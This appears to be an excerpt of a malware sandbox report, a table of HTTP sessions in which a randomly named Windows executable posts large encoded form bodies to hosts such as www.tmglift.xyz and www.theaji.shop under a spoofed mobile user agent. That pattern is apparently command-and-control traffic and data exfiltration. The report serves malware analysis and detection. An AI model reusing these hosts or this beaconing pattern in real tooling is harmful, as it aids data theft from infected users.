Aug 27, 2024 17:48:15.200889111 CEST	1289	OUT	POST /fu44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tmglift.xyz Origin: http://www.tmglift.xyz Referer: http://www.tmglift.xyz/fu44/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 30 49 46 78 31 53 4f 54 61 6d 2f 46 54 4b 32 76 53 56 6d 52 4a 2b 37 2f 58 74 66 48 33 75 63 6a 34 4e 4e 50 76 78 70 68 4f 35 50 6e 64 4b 43 5a 4f 39 59 65 6b 36 75 59 6b 6b 75 52 6b 5a 77 70 4d 62 75 6a 73 4a 77 36 62 33 38 35 57 52 43 4c 63 69 45 51 4e 52 5a 55 61 4a 6a 4c 50 5a 58 71 30 30 52 56 41 31 5a 44 65 39 41 54 5a 77 56 4f 38 41 33 64 35 6c 64 41 69 6f 48 39 30 63 4b 47 51 47 72 39 65 70 44 72 63 59 69 67 62 42 74 69 4d 5a 4f 75 53 65 35 76 42 78 44 4b 2b 4e 62 62 42 37 75 4c 34 74 58 44 54 7a 47 36 72 54 2b 50 35 72 71 51 51 74 2b 4b 79 6f 46 43 49 47 38 78 46 4d 42 63 6f 6e 4d 35 5a 4e 4e 4e 49 59 4d 4c 73 69 4a 2b 31 66 7a 67 72 34 4f 6d 4e 6f 4b 4d 67 34 61 36 65 54 65 59 49 4c 54 56 32 4c 32 64 68 66 34 68 4f 30 61 74 4f 57 4d 76 2b 31 59 42 79 2b 33 32 39 4f 46 30 47 58 35 67 4c 6b 74 68 43 49 77 30 4f 49 6c 34 67 72 77 4f 65 36 46 [TRUNCATED] Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc10IFx1SOTam/FTK2vSVmRJ+7/XtfH3ucj4NNPvxphO5PndKCZO9Yek6uYkkuRkZwpMbujsJw6b385WRCLciEQNRZUaJjLPZXq00RVA1ZDe9ATZwVO8A3d5ldAioH90cKGQGr9epDrcYigbBtiMZOuSe5vBxDK+NbbB7uL4tXDTzG6rT+P5rqQQt+KyoFCIG8xFMBconM5ZNNNIYMLsiJ+1fzgr4OmNoKMg4a6eTeYILTV2L2dhf4hO0atOWMv+1YBy+329OF0GX5gLkthCIw0OIl4grwOe6FMjOj876ncEnVJNztgqMIz0EQjfd4XRMZkjsz7dnDnQHiGtea/UIh+qkx7qGo7ImbbfeEGYf8oONIwYqam+kKDk2u2G38eY7gCb8GYlbvby9j4x4Ww1SKh7emR3gziRfTTzF9w9zyp4YcAkGwcDszHMYBhNzGb4XZrafBjW3r94YLJ/SSjq4VPnYcaHK63nFvG/0SMc3kGEpkSe7wdq+qxtDz0rrEV+jcucFa96B/dRISh5CDSNCDB/hjPnoMjZVO/THNNpkliBfWVFdVpvH/So/vniivbup1l3Xv2jomxvOTEGHsQTb/qJhXZFybXEVbxBpqAKu7beGA9YGpFVPrDs1+ciJVp7cBjlOGAtQTm8vHvZeMz
Aug 27, 2024 17:48:15.200937986 CEST	1289	OUT	Data Raw: 59 63 32 4e 33 6f 50 76 36 4f 53 76 78 5a 36 79 4b 63 32 52 7a 67 6b 63 54 6a 46 42 4b 51 4d 59 51 48 43 71 75 69 4f 4e 6a 43 51 4e 7a 42 32 74 78 48 46 47 50 36 64 34 46 49 62 48 4d 50 4e 53 42 7a 51 77 35 54 6f 52 6b 35 41 43 69 6f 48 36 46 59 Data Ascii: Yc2N3oPv6OSvxZ6yKc2RzgkcTjFBKQMYQHCquiONjCQNzB2txHFGP6d4FIbHMPNSBzQw5ToRk5ACioH6FYNOHqgYC38DOtXbPKMQS7cHGnHMgKl9nxhjaGzlxuaIRVwIjtoWGkO3TV8nG/+yLhZ+5yqm8KzPEJxUxXksRmFEmg7DvREAZ/me/q5O6fodBCDQMAfu6LQDGgGtXxfOO3yHXk1i75y/EIpJqteHSlxCTJKEmUIUKv8
Aug 27, 2024 17:48:15.200989962 CEST	10312	OUT	Data Raw: 4a 44 38 6e 2f 61 41 6f 6a 38 45 34 74 45 6f 68 39 6a 4d 4d 75 58 32 59 6d 50 36 31 32 6f 4f 58 76 37 78 54 2f 62 36 62 79 69 61 76 6e 4a 5a 71 5a 44 55 6c 70 76 55 38 56 44 4f 30 49 42 50 56 75 61 4a 45 66 52 46 36 4e 69 30 30 73 6a 53 77 69 57 Data Ascii: JD8n/aAoj8E4tEoh9jMMuX2YmP612oOXv7xT/b6byiavnJZqZDUlpvU8VDO0IBPVuaJEfRF6Ni00sjSwiWOW2HL+SKPmgE2yL15yeidSq9ToYJSDf1kyskNhT+mlpXmilLn+menGCgeip9mD1AC2U7PdnGIkwrOPcXkM9jXs5WrnDhbOJoVZsIvxmQLUnaZvtJD3dw4uMuCkGcWkvtnOw8+x1463goCTzPi/QATlGmtk0lZB1ZX
Aug 27, 2024 17:48:15.429632902 CEST	1289	OUT	Data Raw: 79 49 44 2b 76 55 61 38 62 6c 4f 6a 31 67 39 4c 5a 45 53 41 72 67 63 43 6d 48 76 39 6c 48 41 47 6a 55 4e 74 5a 6f 79 62 4c 66 4e 30 68 48 52 73 35 39 71 33 56 34 54 50 76 6b 38 41 42 2b 4d 79 76 61 56 4e 57 69 34 59 71 76 66 35 78 78 77 39 78 6a Data Ascii: yID+vUa8blOj1g9LZESArgcCmHv9lHAGjUNtZoybLfN0hHRs59q3V4TPvk8AB+MyvaVNWi4Yqvf5xxw9xjKVtjhz9FniOuio7i6oHbI9srOkcKbL05zy+t6EkQnF2osqakDueIwFh5RjXLkOBTbAJPN6tlu9dmXuT3hFIYgJWLlEBeJ5P85BYWsHUL9T3z8mxLB4nZe7hXODeBt4ia/Ap3GdwS96pHOSPQ2zagEYfF8iPqavISL
Aug 27, 2024 17:48:15.429682016 CEST	1289	OUT	Data Raw: 47 35 4b 56 51 31 6d 34 6c 6e 64 32 58 7a 64 64 32 70 50 52 32 6f 4c 66 58 37 50 4b 6e 52 54 56 74 72 6f 44 2b 68 59 2b 43 35 73 71 49 33 51 7a 73 6f 45 54 44 6e 65 75 71 38 2f 4c 53 42 42 6c 77 4c 75 77 6c 6d 57 63 42 35 73 6d 34 44 47 47 42 69 Data Ascii: G5KVQ1m4lnd2Xzdd2pPR2oLfX7PKnRTVtroD+hY+C5sqI3QzsoETDneuq8/LSBBlwLuwlmWcB5sm4DGGBi1Uzscjbi5/Onq+gt4lNZ8z93OH+1OyKIGnEQLMpDLA89II+E0vgzC4QJ1WqizErGAbvzMWn9ysed5xP2x/79mW0bxxHj6eVV7+I0pawylSO6w1wJFnscs5U8U2h9rGSEGyHF2m1SKFqjOX2/AD0n5DHzEfkN45Zd7
Aug 27, 2024 17:48:15.430154085 CEST	5156	OUT	Data Raw: 61 64 68 36 48 71 78 72 74 6f 32 62 78 50 4f 62 76 41 50 7a 4a 64 55 49 32 69 48 54 42 54 2f 4f 66 4d 4f 61 34 4f 45 66 68 76 2f 54 31 51 75 71 34 59 41 48 46 51 2f 6f 79 72 4d 5a 37 32 6f 31 62 31 70 42 41 70 51 4a 72 36 43 6a 34 39 71 6f 68 59 Data Ascii: adh6Hqxrto2bxPObvAPzJdUI2iHTBT/OfMOa4OEfhv/T1Quq4YAHFQ/oyrMZ72o1b1pBApQJr6Cj49qohY8z9JFbMF4f7NIIUoWLrEZfkpoW62pGznKdJUHaCuDCzJd5IZy9LJ7DngoP2cKWrAL/vLzwwg4XjqESzPoDhYatWk7PffCQFtwhHJ7qZAVsjAlJXj1XCQmDVovzezYpo7LHcy3rI81wWYUGWkYbrvX9TQfZasLV9Xj
Aug 27, 2024 17:48:15.430371046 CEST	2578	OUT	Data Raw: 6b 51 4a 55 50 69 76 6d 35 5a 73 5a 2b 6b 63 34 77 7a 48 50 6a 6c 51 74 76 36 65 69 6c 74 2f 4f 64 38 65 56 47 49 62 51 4e 35 72 76 79 65 38 61 39 71 32 58 56 46 2b 41 55 38 36 56 59 54 6e 75 4f 33 49 71 47 67 56 64 30 2f 59 4d 76 57 67 55 79 44 Data Ascii: kQJUPivm5ZsZ+kc4wzHPjlQtv6eilt/Od8eVGIbQN5rvye8a9q2XVF+AU86VYTnuO3IqGgVd0/YMvWgUyDyMTJwRJH4Qx7WRQhzpHotwNBRp/06I3mMwgLuMN8Ke+UrkaHvZUsXiLgIT0v+z9JeKxCrBGCOtTcwIBJiNhnhpN5bF8ufMQN4oBYRHIHqBZAVbF0tTbJJorkhwlxs8NqQ6605DhCZFPy1n2ZMlEHFgziZ+qFzJh/x
Aug 27, 2024 17:48:15.430541992 CEST	2578	OUT	Data Raw: 65 78 72 46 70 62 61 32 78 64 33 33 6b 4d 41 36 57 34 56 6e 66 65 33 56 34 37 36 47 59 54 66 78 68 78 45 79 42 49 6f 62 49 34 5a 66 4e 79 37 6b 61 35 67 5a 4d 78 76 6a 70 77 61 47 31 77 67 77 38 46 6b 54 42 76 32 41 74 36 4b 6c 7a 30 37 37 4f 63 Data Ascii: exrFpba2xd33kMA6W4Vnfe3V476GYTfxhxEyBIobI4ZfNy7ka5gZMxvjpwaG1wgw8FkTBv2At6Klz077OcdFGA2xPEokT9dnNXV3142oYEqFg/CIXnfAE+QiFs9mDpmhXjBEvpNAtrg546Dk4RK0/SlGnd83kR85aPS/vlEzEfUwp617sytJmnytW9bBhNvLPpYOADR0PxEb80lcD1LoyIU/o8nF2YkoSyQmNCmtDuqAKQ3l+Gi
Aug 27, 2024 17:48:15.430762053 CEST	5156	OUT	Data Raw: 72 2f 37 4c 47 37 56 43 71 70 6d 6a 76 46 43 59 2f 37 34 72 48 54 41 6c 54 6c 7a 63 44 6c 70 37 74 6b 61 58 6b 67 6c 51 58 47 32 61 56 6d 6f 71 62 62 34 6d 55 66 7a 42 2b 33 36 46 64 45 62 6a 4f 59 30 34 53 59 73 37 62 68 7a 70 4b 38 36 48 64 4c Data Ascii: r/7LG7VCqpmjvFCY/74rHTAlTlzcDlp7tkaXkglQXG2aVmoqbb4mUfzB+36FdEbjOY04SYs7bhzpK86HdLyQJDQchyv+chhWKU4mOy4w1/U1UxKXtqL+jLXXY85iFtKPtSugfvPALxiiMtvQhl7YQjsuApjdT4poQf4IStiLTFzPSf8YYZdgM4AImuyUZZk7+/lUT8FRMPhPwKocki0q5X94OaXEtUSiu6h3DjkaoSx5ivSuhr2
Aug 27, 2024 17:48:15.431101084 CEST	2578	OUT	Data Raw: 55 36 50 78 48 4e 79 33 53 59 64 51 70 5a 78 2b 76 49 49 77 2b 67 6f 4b 51 46 46 48 43 42 77 69 33 6c 53 37 53 76 38 6d 4d 4e 2b 68 62 58 7a 75 4a 36 6b 5a 70 4b 30 4f 79 6f 4f 31 7a 33 54 52 79 4a 39 79 68 66 39 79 76 74 34 39 4d 53 6f 48 7a 50 Data Ascii: U6PxHNy3SYdQpZx+vIIw+goKQFFHCBwi3lS7Sv8mMN+hbXzuJ6kZpK0OyoO1z3TRyJ9yhf9yvt49MSoHzPTZADUS5cL4LH3SGGnBkcxovXsO3RuItcXqbjVrAzzIv7B7wa6DwnBX4uJFnc9w362V0W7ysqXa38Yw1k44maZA+RqmZ5lrP8w9dhz6Z1CgHQPUCZmCcwyU0l3KJRhofyr6nfciLtFKlCh5OAwUZ+rqH9pF3X4ZJ+q
Aug 27, 2024 17:48:15.431442976 CEST	2578	OUT	Data Raw: 6b 77 62 66 76 53 65 47 79 51 70 37 4a 59 61 58 35 52 69 39 6c 75 78 59 76 6a 67 76 74 75 5a 6f 45 36 31 31 45 53 54 64 61 49 46 30 34 2f 7a 6e 77 79 4b 30 4f 59 64 30 68 32 37 59 46 33 73 71 65 74 36 77 2f 74 32 4b 68 49 2f 74 35 63 6e 61 44 72 Data Ascii: kwbfvSeGyQp7JYaX5Ri9luxYvjgvtuZoE611ESTdaIF04/znwyK0OYd0h27YF3sqet6w/t2KhI/t5cnaDrwST2Cw9xCIKgYUOSDppOiA9JPn6UKuH//vdor3QZV4kIe6XIIBylzBr1qOkoiNR4A5cNnE6nVU4W8ctCcT5ab/gMcUFS74hzcugtbBsiY2N6tBGRIY6H8L3pYcH/9OAJlevvFp/0zB2r71naDEirhSsQijxqpig1K
Aug 27, 2024 17:48:15.882319927 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:48:15 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T15:48:20.7715590Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.20	49831	85.159.66.93	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:17.961724997 CEST	524	OUT	GET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.tmglift.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:48:18.187541962 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:48:18 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T15:48:23.0765341Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	49832	3.82.56.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:31.600583076 CEST	785	OUT	POST /q3za/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.theaji.shop Origin: http://www.theaji.shop Referer: http://www.theaji.shop/q3za/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 63 55 50 67 4f 34 30 69 75 4c 7a 6d 72 56 52 6d 6f 4f 67 72 7a 2b 68 79 32 59 47 78 4a 4f 6d 6c 61 77 72 38 79 47 64 73 4c 6b 55 45 63 70 44 77 2f 62 2f 31 4b 2f 35 72 6b 46 59 41 37 59 32 69 71 6f 64 4b 30 64 51 65 77 4e 38 31 51 73 63 54 31 70 49 77 35 41 5a 45 42 62 6e 37 56 73 57 33 6a 49 75 78 65 55 46 2f 49 4b 43 6f 66 36 54 58 47 63 66 63 49 4b 76 47 2f 6a 58 31 68 79 32 58 61 31 75 4f 67 78 5a 73 4c 44 59 6c 5a 76 76 4d 53 69 6d 39 6e 72 75 41 4f 58 68 31 79 51 48 6e 72 6d 6f 6a 4b 71 37 33 4f 74 33 66 64 2b 6d 48 68 33 47 54 31 72 6c 4c 44 78 33 41 67 42 2f 55 31 51 3d 3d Data Ascii: AvLLLbOh=cUPgO40iuLzmrVRmoOgrz+hy2YGxJOmlawr8yGdsLkUEcpDw/b/1K/5rkFYA7Y2iqodK0dQewN81QscT1pIw5AZEBbn7VsW3jIuxeUF/IKCof6TXGcfcIKvG/jX1hy2Xa1uOgxZsLDYlZvvMSim9nruAOXh1yQHnrmojKq73Ot3fd+mHh3GT1rlLDx3AgB/U1Q==
Aug 27, 2024 17:48:31.702380896 CEST	457	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:48:31 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 277 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	49833	3.82.56.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:34.229645967 CEST	1125	OUT	POST /q3za/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.theaji.shop Origin: http://www.theaji.shop Referer: http://www.theaji.shop/q3za/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 63 55 50 67 4f 34 30 69 75 4c 7a 6d 74 30 68 6d 76 70 38 72 31 65 68 31 31 59 47 78 48 75 6d 35 61 78 58 38 79 44 73 6e 4c 77 34 45 63 4d 6e 77 78 2b 54 31 5a 50 35 72 76 6c 59 42 6d 49 32 70 71 6f 52 6f 30 5a 59 65 77 4e 59 31 52 65 6b 54 67 70 49 7a 78 67 5a 46 58 4c 6e 32 65 4d 57 74 6a 49 71 58 65 52 74 2f 4c 36 75 6f 5a 4a 37 58 42 49 7a 66 43 4b 75 44 33 44 58 79 76 53 32 77 61 31 71 47 67 30 55 58 65 6c 6f 6c 5a 50 50 4d 56 69 6d 79 74 62 75 62 47 33 67 55 34 30 65 72 71 6e 49 45 62 5a 48 59 45 65 6d 71 41 2b 43 36 6b 6d 36 57 76 36 39 57 4b 67 4f 38 6f 31 6d 4b 6f 68 7a 37 4e 74 69 50 6c 77 73 50 4c 4d 72 7a 50 58 79 59 59 69 5a 4e 6e 62 33 75 34 4a 4e 4a 51 48 31 64 42 45 64 64 51 67 35 6d 30 61 57 6d 72 79 31 57 55 37 33 55 6e 52 77 64 73 69 4a 32 64 2f 2b 32 46 31 56 72 67 31 42 54 4e 59 70 73 4c 66 4a 4f 32 53 47 66 47 33 32 68 30 70 56 2b 66 35 79 44 62 5a 4d 6e 5a 48 6b 38 63 55 4f 54 62 36 4d 42 57 61 49 68 76 4d 56 76 48 49 31 72 4f 59 43 66 6b 36 74 56 54 [TRUNCATED] Data Ascii: AvLLLbOh=cUPgO40iuLzmt0hmvp8r1eh11YGxHum5axX8yDsnLw4EcMnwx+T1ZP5rvlYBmI2pqoRo0ZYewNY1RekTgpIzxgZFXLn2eMWtjIqXeRt/L6uoZJ7XBIzfCKuD3DXyvS2wa1qGg0UXelolZPPMVimytbubG3gU40erqnIEbZHYEemqA+C6km6Wv69WKgO8o1mKohz7NtiPlwsPLMrzPXyYYiZNnb3u4JNJQH1dBEddQg5m0aWmry1WU73UnRwdsiJ2d/+2F1Vrg1BTNYpsLfJO2SGfG32h0pV+f5yDbZMnZHk8cUOTb6MBWaIhvMVvHI1rOYCfk6tVTfUbxXQIT0JywuaWu2LtsbRlOlDtwG42CU8BUWh7ZpFHukbv78TGbXXSM8WJs8KEQSoXINb4TGFateT6TIpV8o2/1Gci2ogQmFFuzambWvYQXmwYvE/sHgaxzJF6Lm2lP2OCiDUEtipvPjnVRnuM0JmqkaBPPNYEFR5AC2BgThSgSDGiRqluw0nGhYhfuu4TKzy32PoFM0MthNg=
Aug 27, 2024 17:48:34.331727028 CEST	457	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:48:34 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 277 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	49834	3.82.56.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:36.881314039 CEST	1289	OUT	POST /q3za/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.theaji.shop Origin: http://www.theaji.shop Referer: http://www.theaji.shop/q3za/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 63 55 50 67 4f 34 30 69 75 4c 7a 6d 74 30 68 6d 76 70 38 72 31 65 68 31 31 59 47 78 48 75 6d 35 61 78 58 38 79 44 73 6e 4c 77 77 45 64 2f 66 77 78 64 72 31 61 50 35 72 78 56 59 45 6d 49 32 30 71 6f 4a 73 30 5a 55 6f 77 50 77 31 52 4e 73 54 68 62 51 7a 30 67 5a 47 4f 37 6e 30 56 73 57 35 6a 49 75 44 65 52 6f 45 49 4b 61 6f 66 36 6a 58 46 35 7a 63 64 71 76 47 33 44 58 2b 6c 79 32 43 61 30 36 57 67 30 51 58 65 6a 77 6c 62 39 33 4d 57 7a 6d 79 67 72 75 45 4d 58 67 66 32 6b 65 43 71 6e 4d 51 62 5a 47 74 45 66 69 71 41 35 4f 36 6e 68 75 4a 68 36 39 57 43 41 4f 2f 73 31 69 77 6f 68 48 5a 4e 74 57 50 6c 79 73 50 49 73 72 7a 45 57 79 66 4d 53 5a 50 77 37 33 35 38 4a 42 37 51 45 4a 6a 42 46 35 64 51 55 5a 6d 33 4a 4f 6d 70 54 31 57 55 62 33 57 6f 78 77 77 6d 43 4a 71 64 2f 76 4b 46 78 5a 52 67 33 4e 54 4d 39 56 73 64 75 4a 50 79 79 47 52 49 58 32 77 77 70 52 36 66 39 65 66 62 5a 4e 71 5a 47 51 38 63 67 79 54 61 37 4d 47 58 71 49 71 6e 73 56 2b 4f 6f 70 6c 4f 5a 75 48 6b 36 6b 4f 54 [TRUNCATED] Data Ascii: AvLLLbOh=cUPgO40iuLzmt0hmvp8r1eh11YGxHum5axX8yDsnLwwEd/fwxdr1aP5rxVYEmI20qoJs0ZUowPw1RNsThbQz0gZGO7n0VsW5jIuDeRoEIKaof6jXF5zcdqvG3DX+ly2Ca06Wg0QXejwlb93MWzmygruEMXgf2keCqnMQbZGtEfiqA5O6nhuJh69WCAO/s1iwohHZNtWPlysPIsrzEWyfMSZPw7358JB7QEJjBF5dQUZm3JOmpT1WUb3WoxwwmCJqd/vKFxZRg3NTM9VsduJPyyGRIX2wwpR6f9efbZNqZGQ8cgyTa7MGXqIqnsV+OoplOZuHk6kOTc4bx3QIXnh9/ubchWLFm7RUOl+MwCgACkQBVmx7d5FYlkaoxcTAfXXSM8Kzs8GETjQXSa/4WVtaveTwTIpA8o6U1GVB2pRFmDVuyP6bbNgTd2wBlk/FYwemzNtiLmmfPEKCjDkEpipsEjnSZHuawJq2kaNlPOEUFT5ACH17LDGDWF/rNYdZnk/Vjv9riOcqJmCv48IUXmkRw6f0S11CQTC4wYJ80nK67ww2kMrAe1UoyMiCFbkCrG0PD//uqA9QOgO4Cc4tHt1CISKh+fQd2O7/U1u8KjziSYFg3BjL73wdVLD8ADrHRY+GhhCmI8nFG07GCXezEdr9KnEMGIYyPCncSbQDfmialnBNh7cbHcaILkoK5U
Aug 27, 2024 17:48:36.881349087 CEST	5156	OUT	Data Raw: 30 70 58 6d 66 36 58 48 42 73 58 50 33 66 4f 4a 30 58 43 53 6b 59 64 56 6f 56 37 73 44 47 2b 4b 58 7a 50 52 36 2b 4b 5a 6b 47 61 70 37 35 46 6a 52 36 6c 78 32 65 6f 52 2f 55 6f 7a 4e 56 31 7a 70 32 42 45 32 42 6f 77 4e 5a 49 41 50 77 6c 51 38 45 Data Ascii: 0pXmf6XHBsXP3fOJ0XCSkYdVoV7sDG+KXzPR6+KZkGap75FjR6lx2eoR/UozNV1zp2BE2BowNZIAPwlQ8EC8Q2fDDEIrvzCJ2tkrjKacr2M9jYc9I96Oh8bBbI5yWVScgNLXAbbx1CIiJQL0eZHZJc3C818lbcFXe5cfDDXGJECL+Vw/OWsXoPZ56OWHCA0zwlHukvSiHFkVpwXWhWZ3eS+qVpSPkPpN1205uJDpS5U3VyyqyFC
Aug 27, 2024 17:48:36.881406069 CEST	6445	OUT	Data Raw: 4c 61 41 45 52 41 64 4e 31 69 4d 34 32 65 75 74 41 4c 6a 6f 2b 42 35 5a 37 62 6d 2f 2f 2b 50 4e 67 63 61 32 4d 7a 79 79 54 52 35 53 6f 4a 71 6c 4c 38 32 48 66 42 70 4e 38 44 72 74 46 6d 44 55 53 61 7a 68 78 66 37 45 6d 44 64 32 4b 39 65 51 38 69 Data Ascii: LaAERAdN1iM42eutALjo+B5Z7bm//+PNgca2MzyyTR5SoJqlL82HfBpN8DrtFmDUSazhxf7EmDd2K9eQ8iSgitovM96PzLdaodHT44H9x9ijm9fdFV8yZfJYOHl2CFprO9tl6e5ATF8VlWJuYL25E7DF8r53aBsYC17GaCUOOVKbF8p2/s21mWvAkZUFo/uQn7Hr3o55R8h4b/97PJYcOdP1phXtSQsCVuakm+50b8ztPkuIpCm
